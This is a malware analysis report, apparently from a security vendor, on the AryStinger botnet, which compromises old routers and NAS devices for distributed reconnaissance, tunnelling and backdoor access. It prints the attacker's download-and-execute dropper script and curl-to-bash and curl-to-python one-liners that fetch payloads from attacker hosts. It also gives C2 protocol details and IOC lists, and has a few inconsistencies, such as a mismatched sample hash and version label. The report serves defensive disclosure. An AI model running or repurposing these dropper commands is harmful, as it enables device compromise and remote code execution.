Background

On May 20, 2026, the Ministry of State Security's WeChat official account published an article "Your internet is slow, and the culprit turns out to be this!", highlighting that outdated routers are becoming a key entry point for threat actors to conduct cyber espionage. Inspired by this article, we feel it is imperative to take the compromise of old routers seriously. This article introduces an unusual attack campaign observed within QiAnXin XLab's field of view, specifically targeting router devices based on the RTL819X series chips. The mainstream active period of the RTL819X series chips was concentrated around 2012 to 2015. The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers, building reconnaissance and attack clusters for use in the pre-intrusion footprinting stage. (Note: The campaign disclosed in this article has no direct relationship to what the Ministry of State Security described.)

Let's turn the clock back to March 12, 2026, when the XLab Network-wide Threat Awareness System detected IP 107.150.106.14 spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681. The devices affected by these two vulnerabilities are several Linksys and D-Link router models from more than 10 years ago, respectively. Unlike the common practice of exploiting IoT device vulnerabilities to build DDoS or mining botnets, this campaign aims to build an infrastructure cluster for intrusion reconnaissance activities, possessing information-gathering capabilities such as port scanning, service identification, and subdomain enumeration. On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837. This sample is implemented in Go, and its source code path hints that the project name is Ary-Attack. Based on its behavioral characteristics and technical origins, we named this unknown virus family AryStinger.

AryStinger is a typical bot. It communicates with the C2 server over HTTP/HTTPS protocols. Network traffic is encoded using Protobuf and supplemented with simple XOR encryption. After completing identity authentication with the C2 server and obtaining configuration updates, the program enters a standby state, waiting to execute tasks issued by the server. AryStinger supports multiple task types, including internal/external network scanning, traffic tunnel forwarding/proxying, system command execution, source-level Payloads in three languages—Go/Java/Python—as well as building persistent remote management channels through dropbear or gs-netcat. Ultimately, the infected device can be used both for internal network penetration and lateral expansion, and for launching external attacks. At the same time, it can effectively hide the attacker's true identity and physical location, becoming a key springboard in the entire attack chain that integrates concealment, relay, and offensive capabilities.

Each node running AryStinger is called an Executor. The attacker can split a massive scanning task into multiple small chunks and distribute them to different Executors for parallel execution. With this distributed-like design, the attacker can efficiently complete the early "footprinting" activities, thereby providing strong assurance for the smoothness and success rate of subsequent intrusion operations.

According to asset detection data from the QiAnXin Cyberspace Mapping Eagle Map Platform, at least 4,300 routers worldwide have already been infected, and the number is still continuously rising. It should be noted that this figure only covers AryStinger's infection situation on RTL819X-class devices; there is currently no means to measure the scale of its infection on NAS devices. We do not yet know whether, beyond the known RTL819X and NAS, there are other attack targets. In addition, AryStinger's network communication uses a hardcoded key sh_#@!_2024_secret, and whether the "2024" in it implies that the attacker began such activities as early as 2024 is likewise unknown.

Although many mysteries surrounding AryStinger remain to be solved, the mere fact of its targeted attacks against old routers is enough to define it as a real threat not to be underestimated. As the Ministry of State Security warned: "As a key device for daily internet access, once a router is illegally compromised, it will not only threaten personal privacy and property security, but may even endanger national security." Even more concerning is that this malicious sample and its associated C2 servers have an extremely low detection rate in mainstream security engines. It is precisely in view of the compounded risk of this "low detection rate" and "high potential harm" that we decided to write this article and share our research findings with the security community, in the hope of jointly addressing potential risks and safeguarding overall network security.

Infection Scale

AryStinger deploys dropbear on a specific port of the compromised device. Based on this behavioral characteristic, through asset mapping, we discovered that at least more than 4,300 routers worldwide have been infected.

The infected devices are mainly D-LINK routers. The affected models are shown in the table below, mainly distributed across South Korea 48.45%, China 31.82%, Sweden 6.40%, Malaysia 3.50%, and Singapore 2.50%.

Technical Analysis

AryStinger is divided into two versions, RTL819X and Standard: the former is implemented in C, mainly targeting old routers such as Linksys and D-Link, with only massdns and tunnel functionality, making it relatively single-purpose; the latter is implemented in Go, aimed at NAS devices, with more comprehensive functionality. In addition to IP scanning, DNS scanning, and HTTP Alive scanning, it also integrates penetration tools such as fscan, ksubdomain, httpx, and Tlsx, and supports remote command execution and Payload execution. Although the two differ in language and feature set, their core working logic is essentially the same. In fact, RTL819X is a streamlined version of Standard; precisely because the performance of old routers cannot support the full functionality of the Standard version, the attacker chose to re-implement part of Standard's capabilities in C.

Part1: AryStinger RTL819X Version

The script through which AryStinger RTL819X spreads via CVE-2013-3307 and CVE-2016-5681 is shown below. Its function is to first obtain the latest version number from the download server hgodpcx[.]ajb8.com, then download and execute the corresponding AryStinger sample.

#!/bin/sh
ENV="${ENV:-prod}"
BASE_URL="http://hgodpcx[.]ajb8.com"
VERSION=`wget -qO- "${BASE_URL}/${ENV}/RTL819X/latest"`
SRC_URL="${BASE_URL}/${ENV}/RTL819X/${VERSION}/syswapd0"
BIN_DIR="/tmp/bin"
BIN_PATH="${BIN_DIR}/syswapd0"
[ "$#" -gt 0 ] && CTX="$1" || CTX=""
killall -9 syswapd0h >/dev/null 2>&1 || true
killall -9 syswapd0w >/dev/null 2>&1 || true
mkdir -p "${BIN_DIR}"
rm -rf "${BIN_DIR}"/*
wget -q -O "${BIN_PATH}" "${SRC_URL}"
chmod +x "${BIN_PATH}"
"${BIN_PATH}" -b "${CTX}" >/dev/null 2>&1 &
rm -rf /tmp/cc.sh

Since March 12, we have captured a total of 32 AryStinger sample files with different version numbers. Although there are many versions, the functionality has actually changed little. This article selects V2.0.27 as the main analysis subject; below is its basic information.

MD5: abae20b26b70b526bebb5e2617092ede

MAGIC: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

Version 2.0.27

AryStinger supports a total of 12 different parameters, whose usage is described in detail in the usage. Most are related to scanning, such as setting the concurrency of DNS scanning, timeout duration, and log callback domain.

If the -d parameter is specified at runtime, daemon mode will be disabled. At this point AryStinger will print debug information in the foreground, including the version number, C2, and information related to multiple tasks such as authsvc, hbsvc, and updatesvc.

In fact, AryStinger's main core working logic is jointly composed of tasks such as authsvc, hbsvc, and watchdogsvc.

The overall workflow is as follows:

1. AUTH (Identity Authentication)
   Sends device information to the C2 server eixfi.ajb8.com through the /auth interface for identity authentication. After authentication passes, the C2 assigns a unique Executor ID to the Bot, and from then on all communications between the Bot and the C2 will carry this ID as an identity credential.
2. HB (Heartbeat and Configuration Update)
   Implements heartbeat reporting and configuration update functionality through the /heartbeat and /config interfaces.
3. Watchdog (Download and Deployment)
   Downloads the dropbear program from the Download server hgodpcx.ajb8.com and deploys it to run on port 2332.
4. Upgrad (Sample Self-Upgrade)
   Implements the automatic upgrade capability of the malicious sample.
5. TASK (Task Pulling)
   Pulls domain probing tasks from the C2 server.
6. WORKER (Task Execution)
   Executes the specific tasks issued by the C2.
7. TUNNEL (Tunnel Penetration)
   Provides tunnel functionality, used to proxy or forward network traffic. This functionality was added after V2.0.27 and uses 2 additional C2s, sdkv1.dataexplore.cc and sdkv1.dataexplore.co.

The following sections will focus on the three major tasks—authsvc, watchdogsvc, and tasksvc—to analyze AryStinger's functional implementation.

① authsvc Task

The Bot collects the device's fingerprint information through the build_request_auth function, including the MAC address, device name, public address, internal address, operating system version, CPU architecture, current timestamp, and so on. This sensitive data is first encoded with Protobuf, then XOR-encrypted using the hardcoded key sh_#@!_2024_secret, and finally reported over the HTTP protocol to the C2's /auth interface. After the C2 receives the above message, if it determines that the identity authentication request comes from a real device, it will assign an Executor ID to the Bot as a credential for subsequent task dispatch.

The sample we ran on our test device is V2.0.28; the request traffic it generated is shown below:

After XOR decryption and Protobuf deserialization, the above traffic is shown below, corresponding exactly to our analysis.

The C2's response data to the above request is 63 a5 cd c2 42 81 59 33. Using the same method to decrypt it, we can see that the Executor ID assigned by the C2 to the Bot is 5785933.

{
    "2": 5785933,
    "100": 1
}

② watchdogsvc Task

The Bot downloads dropbear (a lightweight SSH server) and dropbearkey (a key generation tool) from the Download server to the /tmp/bin/ directory, starts the dropbear SSH service on a specific local port, and configures iptables to allow traffic on that port, thereby establishing a persistent remote login backdoor for the attacker.

③ tasksvc Task

The Bot obtains domain scanning tasks by sending requests to the C2's /cmd interface. This request carries the X-Executor-ID field in the HTTP header, with the value being the 5785933 assigned during the identity authentication stage, used to identify itself. AryStinger implements scanning functionality similar to massdns. It extracts parameters such as scan step size, offset, top-level domain list, scan type, subdomain length range, retry count, timeout duration, custom character set, and DNS server list from the tasks issued by the C2, constructs a task object, and hands it over to worksvc for execution. This design means the attacker can split a large-scale scanning task into multiple subtasks and distribute them to different Bots for parallel processing, thereby achieving distributed scanning.

Taking the real interactive traffic generated on the test device as an example, let's first look at the Bot's request message. The value of X-Executor-ID is precisely the 5785933 issued by the C2 during the authsvc task.

Now let's look at the C2's response message. After the encrypted data is XOR-decrypted and Protobuf-deserialized, the task configuration can be extracted: this issuance is a .ba top-level domain brute-force task with an offset value of 11,654,000,000. This indicates that the Bot is assigned to scan the middle-front region of length-7 subdomains, covering about 12% of the scanning space within that length range.

After receiving this instruction, the actual Bot will launch a scan against the .ba top-level domain, generating the scanning traffic shown in the figure below. In fact, we believe that in addition to being used for domain brute-forcing, the attacker can also use this type of task to launch DDoS attacks against DNS Resolvers.

Part2: AryStinger Standard Version

The script through which AryStinger RTL819X spreads via CVE-2025-11837 is shown below. Its function is to set the environment variable B64, and download and execute scripts n and t from a remote server respectively. The main function of script n is to download and execute the latest version of AryStringer; while the function of script t is to download and execute the tunnel tool.

curl -fsSL https://hgodpcx[.]ajb8.com/n 
| env B64=H4sIAAAAAAAA_...[omit]... bash; 
curl -skL https://hgodpcx[.]auq8.com/t | python

Since April 26, we have captured 22 AryStinger Standard version sample files with different version numbers. This article selects V1.0.102 as the main analysis subject; its basic information is shown below:

MD5:a5101caf0a1789d6a4bc30e644d6b152
MAGIC:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked
Packer: UPX
Version: 1.0.102

The core workflow of AryStinger Standard is concentrated in 6 functions, which can be clearly divided into two categories: one is installGSocket, and the other is multiple Loop functions (such as authLoop, cmdLoop, etc.). These functions correspond one-to-one with the RTL819X version in functionality, differing only in specific implementation. For example, the way the persistent remote management channel is built: the RTL819X version achieves it by downloading and deploying Dropbear, while the Standard version achieves it by downloading and deploying gs-netcat through main_installGSocket.

The specific function correspondence between AryStinger Standard and AryStinger RTL819X is shown in the table below. Compared with the RTL819X version, the Standard version not only adds the intranet scanning (intranetScan) function, but also expands the task types issued by the C2 from a single masscan to a total of 6 types of tasks, such as ScriptWork and HttpAliveWork.

The following sections will revolve around the changes in the Standard version compared to the RTL819X version, briefly analyzing its functional implementation from two aspects: network communication and new features.

① Network Communication

AryStinger Standard hardcodes two C2 addresses, dybic.ajb8.com and opi7.com, with communication based on the HTTPS protocol. Its data packets are serialized using Protobuf, then Gzip-compressed and XOR-encrypted. Taking the identity authentication request initiated by the main_authLoop function as an example, the actual traffic (V) generated is shown below:

After the data packet is sequentially XOR-decrypted, Gunzip-decompressed, and Protobuf-decoded, what is restored is precisely the various types of sensitive information from the test device.

② New Tasks

AryStinger Standard has greatly expanded the task types issued by the C2, increasing from the original single type to the following 6 types. The functionality of each function is directly reflected by its function name, so this article will not elaborate on them one by one, and will only give a brief explanation of the most representative one, ScriptWork.

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python. This design greatly enhances the attacker's operational flexibility: there is no need to compile binary files separately for different platforms, nor to care about the specific architecture of the target device—it only needs to directly issue the source code to dynamically execute it. Whether for information gathering, persistence, or lateral movement, the attacker can quickly customize and distribute functional modules according to the actual scenario, greatly reducing the attack cost and time window.

Although this design is flexible, its drawbacks are also obvious: the execution environment is heavily dependent (e.g., Python, Java, Go). Once the environment is missing, the attacker has to perform additional download and installation operations. This not only significantly lengthens the attack chain and increases the risk of exposure, but may also directly cause the entire attack process to break down in restricted intranet or container environments. At the same time, the source code must be dropped to disk in plaintext file form, and the command line of the interpreter process will also be clearly recorded by the system audit logs. Compared with fileless, in-memory binary Payloads, the exposure surface is greatly increased, making it easier to be captured and traced by security products such as EDR and HIDS.

③ Intranet Scanning

AryStinger builds powerful intranet reconnaissance capabilities by integrating open-source tools such as Fscan and Ksubdomain. It can automatically collect key information such as system configuration, processes, network, and vulnerabilities.

AryStinger's working directory is /tmp/bin, where it saves its downloaded open-source toolset and the scan results of the intranet scanning set. When the scan is complete, these results will be sent back to the C2. Based on this aggregated intranet situational information, the attacker formulates precise subsequent intrusion or lateral movement strategies, achieving a closed loop of attack activities.

④ Tunnel Functionality

AryStinger Standard itself does not possess tunnel functionality. However, the Payload used in vulnerability propagation contains the code: curl -skL https://hgodpcx[.]auq8.com/t . The 't' downloaded by this command is a Python script whose core role is to further download and execute nat_tunnel-linux-x86_64, thereby achieving tunnel penetration. The sample contains hardcoded C2 infrastructure identical to that used in the RTL819X Tunnel.

nat_tunnel-linux-x86_64 is suspected to be AI-assisted in its generation. Its hardcoded C2 is consistent with the RTL819X version's Tunnel, and its function is likewise to establish a traffic proxy or forwarding channel on the infected host.

Summary

This is the core intelligence we have on the AryStinger family. Old routers have long lacked firmware updates and security maintenance. Once compromised by malware like AryStinger that possesses reconnaissance and covert control capabilities, it is equivalent to a hacker placing a permanent "invisible listening device" and "attack springboard" within your network. The attacker can thereby easily achieve the following threefold harm:

• Theft: Silently monitoring all inbound and outbound traffic, stealing all kinds of sensitive information.

• Hijacking: Arbitrarily tampering with DNS, directing users to phishing, pornography, gambling websites, or other virus/trojan download pages.

• Covert Attack: Using the controlled router as a springboard to launch scanning, penetration, DDoS attacks, or spread malware against global targets, while the true attack source is difficult to trace.

There is no doubt that when a large number of old devices are gradually compromised and aggregated, ultimately forming a massive covert botnet, this will pose a continuous, covert, and highly destructive real threat to personal privacy, enterprise security, and even national critical network infrastructure.

We strongly recommend that readers immediately conduct a self-check from the following 3 levels to determine whether their system has been infected, and promptly replace or take offline old router devices whose firmware has not been updated for a long time. Please do not leave your "network gateway" open to hackers.

• Network: Check whether there is communication with the IOC domains in this article.

• Files: Log in to the device and check whether malicious samples exist in the /tmp/bin directory.

• Processes: Check whether the syswapd0h or syswapd0w processes exist.

Currently, we are still digging deep into the criminal group behind ArySstinger, and we welcome readers who know the inside story to provide us with more intelligence. If you are interested in our research, or wish to obtain help, you can contact us via the X platform.

IOC

C2

http://opi7.com
http://xook.ajb8.com
http://xonice.ahb8.com
http://eixfi.ajb8.com
https://dybic.ajb8.com


https://sdkv1.dataexplore.cc
https://sdkv1.dataexplore.co

Downloader

hgodpcx.auq8.com
hgodpcx.ajb8.com
io.ary2.com

Scanner IP

107.150.106.14

manifest URL

https://hgodpcx.ajb8.com/prod/RTL819X/{version}/manifest.json
https://hgodpcx.ajb8.com/prod/standard/{version}/manifest.json

Downloader URL

http://hgodpcx.ajb8.com/prod/RTL819X/{version}/syswapd0
https://hgodpcx.ajb8.com/prod/standard/{version}/syswapd0-linux-amd64

Sample

#RTL819X
df0c9f6289e56f31c0700f40590857d3 *syswapd0_V2.0.1
98e55d712a99d2cd45e8592c6dda5110 *syswapd0_V2.0.2
10ba24db187836efe77ed7e75d279d33 *syswapd0_V2.0.3
6f761f63642cd6329a29cfad80be50c3 *syswapd0_V2.0.4
dbcc5a3e6afe41060d6357e24dc03fd3 *syswapd0_V2.0.5
a97e552f5e655e1cfa56853f65beeb0e *syswapd0_V2.0.6
c113739225ece5f6e4805466dec1401d *syswapd0_V2.0.7
0a2d2a4ec1ca2aa6a23a35abb5a75451 *syswapd0_V2.0.8
dd1e5a3cd9f842bd70be45a62c3ebbf6 *syswapd0_V2.0.9
16fed5909de4f50351fc33fbfcf156df *syswapd0_V2.0.10
6f91d1f8f0cbaab137351936b52f7a94 *syswapd0_V2.0.11
fc4cee066d8526f5806bb23278f647da *syswapd0_V2.0.12
7b361a6d0d42309d09ec9000b53712b3 *syswapd0_V2.0.13
18f894a3168ee0b809eed321a2e748b4 *syswapd0_V2.0.14
0627f034c42549e2130734b5f8dbf854 *syswapd0_V2.0.15
b9406e969cdfdaef433e93d0b9ad1f5d *syswapd0_V2.0.16
f093891e281bcd9c8016dea7d89cc671 *syswapd0_V2.0.17
9221423d7daff9e64f7e2af54f911fea *syswapd0_V2.0.18
7f2b2e3516fa454adfd51f857ae80adf *syswapd0_V2.0.20
dbdd4d8e4aef3ce69cf65ed470425c89 *syswapd0_V2.0.21
d79270ba44e665ebb0383eb77a52e38b *syswapd0_V2.0.22
36ff9f683e870145aaf5a715bc934762 *syswapd0_V2.0.23
dc35086ba0f5f83545c32a023a1f3be4 *syswapd0_V2.0.24
7461445fca3f9d8911148e0908d33c3b *syswapd0_V2.0.25
a3181550e0e0a6153a44b7a0495535b0 *syswapd0_V2.0.26
4c80d17fa5db5b1c2aaddb5351e9cb6b *syswapd0_V2.0.27
abae20b26b70b526bebb5e2617092ede *syswapd0_V2.0.28
fffcbd0ac2cb545496890f50395181ff *syswapd0_V2.0.29
a3e3197e2344c51e95c063541ea22205 *syswapd0_V2.0.30
e9916ff56074725f5739ead5091fe6c7 *syswapd0_V2.0.31


#Standard
ff11e000f377c54dea928b09ebad9df8 *syswapd0-linux-amd64-V1.0.61
fcc9de5c040307e6ac3011e8b379f6d9 *syswapd0-linux-amd64-V1.0.62
ed9209111b995cbe78f8e097c289f127 *syswapd0-linux-amd64-V1.0.63
b104a05e8a2e218adfb7654ba8bf3d49 *syswapd0-linux-amd64-V1.0.64
9660895fa3fcabbef466703636f6d51d *syswapd0-linux-amd64-V1.0.66
b0f4f813a9de094c06821366e2459aee *syswapd0-linux-amd64-V1.0.67
8cc249b16adf7e4a658af7fa31d7998e *syswapd0-linux-amd64-V1.0.68
9973676bfa9fe89aa5c76e3cd0b21ae8 *syswapd0-linux-amd64-V1.0.76
d997efa98afab2c003654b8d5ce2bedf *syswapd0-linux-amd64-V1.0.79
8deb2a60d42de0f8f8786e485d2f046f *syswapd0-linux-amd64-V1.0.80
dc71c10ca0b2c83b6b3a6a062fca314f *syswapd0-linux-amd64-V1.0.81
6869f24aecd75e2144aba8dc03dc2d0f *syswapd0-linux-amd64-V1.0.88
05627d1bddb7292bb45139244f46051f *syswapd0-linux-amd64-V1.0.89
19232d0eff3ef7aee3b5d7620c72358c *syswapd0-linux-amd64-V1.0.90
8edb3ea62a7e643ba1a88d20799cf94f *syswapd0-linux-amd64-V1.0.91
ea2fe3b409da439aec25cf7eabf5b7a7 *syswapd0-linux-amd64-V1.0.93
0ffb4b4e430f4b69216fb9d2e082e482 *syswapd0-linux-amd64-V1.0.95
5d9cdb072415b191df3f444f53b2ff4b *syswapd0-linux-amd64-V1.0.96
44805c4b36bd3d97ba8ecaf6fe103572 *syswapd0-linux-amd64-V1.0.97
d2fd89ebdad493ec9ac76ce35213cec4 *syswapd0-linux-amd64-V1.0.98
a2d54fcd0c2816f607a5962523fc648c *syswapd0-linux-amd64-V1.0.101
a5101caf0a1789d6a4bc30e644d6b152 *syswapd0-linux-amd64-V1.0.102

#Tunnel
e6b27080aa1ce1901a23dd75716d9092 *nat_tunnel-linux-x86_64